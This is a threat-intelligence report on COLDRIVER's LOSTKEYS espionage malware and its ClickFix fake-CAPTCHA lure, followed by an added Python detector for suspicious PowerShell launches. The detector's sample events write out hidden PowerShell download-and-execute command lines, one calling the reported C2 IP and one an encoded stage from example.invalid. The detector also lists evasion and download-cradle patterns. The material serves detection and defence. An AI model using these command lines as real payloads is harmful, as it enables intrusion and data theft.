Full Report
The Russia-linked threat actor known as COLDRIVER has been observed distributing a new malware called LOSTKEYS as part of an espionage-focused campaign using ClickFix-like social engineering lures. "LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," the Google Threat
Analysis Summary
# Threat Actor: COLDRIVER
## Attribution & Identity
* **Attribution:** Russia-linked threat actor.
* **Known Aliases/Groups:** Callisto, Star Blizzard, UNC4057.
* **Associated Activity:** Historically known for credential phishing campaigns, but recently observed distributing custom malware for espionage.
## Activity Summary
COLDRIVER has been observed distributing a new malware named **LOSTKEYS** as part of an espionage-focused campaign. This campaign utilized ClickFix-like social engineering lures (fake CAPTCHA verification prompts). The attacks were observed in January, March, and April 2025, targeting current and former advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine. LOSTKEYS is the second custom malware attributed to COLDRIVER after SPICA. Previously, the actor focused on stealing credentials, exfiltrating emails, and stealing contact lists post-compromise. Artifacts linked to LOSTKEYS were also found masquerading as Maltego-related binaries dating back to December 2023, though the direct link to COLDRIVER for these older artifacts is unconfirmed.
## Tactics, Techniques & Procedures
* Social Engineering via decoy websites featuring fake CAPTCHA verification prompts.
* Weaponizing the **ClickFix** technique: Instructing victims to open the Windows Run dialog and paste a pre-copied PowerShell command.
* **Initial Access/Execution:** The pasted PowerShell command downloads and executes a second-stage payload from a remote server.
* **Evasion:** The downloader performs checks likely intended to evade execution in virtual machines.
* **Second-Stage Payload:** A Base64-encoded blob decoded into a PowerShell script responsible for executing the final malware.
* **Data Stealing:** LOSTKEYS exfiltrates system information, running processes, and files based on a hard-coded list of extensions and directories.
* Selective malware deployment, suggesting highly targeted attacks.
* Previously known for credential stealing and email exfiltration from compromised accounts.
## Targeting
* **Sectors:** Western governments (advisors), militaries (advisors), journalism, think tanks, and Non-Governmental Organizations (NGOs).
* **Geography:** Geographies associated with Western governments and individuals connected to Ukraine.
* **Victims:** Current and former advisors to Western governments and militaries, journalists, think tanks, and NGOs.
## Tools & Infrastructure
* **Malware Families Used:**
  * LOSTKEYS (new custom malware focused on file and system data theft).
  * SPICA (previously attributed custom malware).
* **Infrastructure (C2, domains, IPs):**
  * Remote server IP: `165.227.148[.]68` (hosts the initial payload execution components).
## Implications
COLDRIVER is demonstrating an evolution from purely credential phishing to deploying sophisticated, targeted custom espionage malware (LOSTKEYS), suggesting a persistent focus on high-value geopolitical targets related to Western interests and Ukraine. The adoption of file-stealing capabilities post-access indicates a mature intelligence collection capability.
## Mitigations
* Implement rigorous DMARC/SPF/DKIM policies to protect against credential phishing precursors.
* Treat unsolicited prompts that instruct users to paste and run commands (e.g., PowerShell via the Windows Run dialog) with suspicion, even when they are presented through convincing interfaces such as fake CAPTCHA pages; where feasible, disable or restrict execution of PowerShell commands launched directly from user interaction.
* Monitor endpoints for the execution of multi-stage PowerShell scripts downloaded via web interactions.
* Implement application control to restrict the execution of unknown or unsigned binaries downloaded remotely.
* Deploy endpoint detection and response (EDR) capable of detecting VM/sandbox evasion techniques.
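The detection logic below is an added example and is not code from the report, from Google's Threat Intelligence Group, or from any vendor tool. It ties together the ClickFix chain described under Tactics, Techniques & Procedures (PowerShell launched from the Run dialog, evasion flags, a download cradle, a Base64-encoded second stage) and the endpoint-monitoring mitigation above: it scores constructed Sysmon-style process-creation records, decodes any `-EncodedCommand` blob so the real script is inspected rather than base64 noise, and matches the remote server IP listed in the report. The field names, weights, threshold and sample events are assumptions made for this example.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example (not from the report or from any vendor tooling). Field names,
weights, threshold and the sample events below are assumptions.
"""
import base64
import re

# Indicator from the report, kept defanged as written there; refanged for matching.
KNOWN_C2 = {"165.227.148[.]68".replace("[.]", ".")}

# ClickFix victims paste the command into the Run dialog, so explorer.exe is the parent.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# Flags commonly used to hide the window or skip policy/profile checks (weight 1 each).
EVASION_FLAGS = [r"-w(?:indowstyle)?\s+hidden", r"-nop\b", r"-enc(?:odedcommand)?\b",
                 r"-e(?:p|xecutionpolicy)\s+bypass"]

# Download-and-execute primitives that stage a second payload (weight 2 each).
CRADLE_PATTERNS = [r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
                   r"invoke-webrequest", r"\biwr\b", r"frombase64string", r"net\.webclient"]

# -EncodedCommand / -enc / -e followed by a base64 blob (a UTF-16LE script).
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

ALERT_THRESHOLD = 4  # assumed: tune against your own baseline


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or '' if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def analyze(event):
    """Score one process-creation event; return (score, reasons)."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    score, reasons = 0, []
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    # Swap the raw blob for a marker so patterns match real content, not base64 noise.
    text = ENC_RE.sub("-enc <decoded>", cmd).lower()
    if decoded:
        reasons.append("encoded command decoded for inspection")
        text += " " + decoded.lower()
    if event["parent"].lower() in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append("powershell spawned by explorer.exe (Run dialog / ClickFix pattern)")
    for pat in EVASION_FLAGS:
        if re.search(pat, text):
            score += 1
            reasons.append(f"evasion flag matches {pat}")
    for pat in CRADLE_PATTERNS:
        if re.search(pat, text):
            score += 2
            reasons.append(f"download cradle matches {pat}")
    for c2 in KNOWN_C2:
        if c2 in text.replace("[.]", "."):
            score += 5
            reasons.append(f"contacts known C2 {c2}")
    return score, reasons


def scan(events):
    """Return alerts (index, score, reasons) for events at or above ALERT_THRESHOLD."""
    alerts = []
    for i, ev in enumerate(events):
        score, reasons = analyze(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"index": i, "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry). The first two model the ClickFix
# chain from the report; the last two are benign noise that must not alert.
_STAGE2 = base64.b64encode(
    "IEX (iwr http://example.invalid/stage2).Content".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('http://165.227.148.68/x')\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + _STAGE2},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"event {alert['index']}: score {alert['score']}")
        for reason in alert["reasons"]:
            print("  -", reason)
```

Run as a script to see the two modelled ClickFix events alert while the scheduled backup script and the notepad launch stay silent. The parent-process check is the cheapest signal for this chain, because a pasted Run-dialog command always arrives as a child of explorer.exe; the decode step matters because the second stage in the report is delivered as a Base64 blob, and a rule that only inspects the raw command line would miss the cradle inside it.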